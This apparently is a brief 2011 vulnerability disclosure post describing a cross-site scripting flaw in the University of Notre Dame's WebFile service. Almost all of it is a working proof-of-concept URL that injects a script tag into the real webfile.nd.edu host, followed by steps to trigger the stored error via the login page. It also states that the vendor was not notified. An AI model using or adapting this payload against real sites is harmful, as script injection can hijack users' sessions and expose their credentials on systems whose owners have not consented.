25
Sep 11University of Notre Dame WebFile
Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://webfile.nd.edu/~</script><script>alert('0');</script>/apps/webfile
Note:
After hitting the URL, go back to the webfile login (https://webfile.nd.edu) and use any dummy login credentials. Previous XSS will be present and spark an internal server error.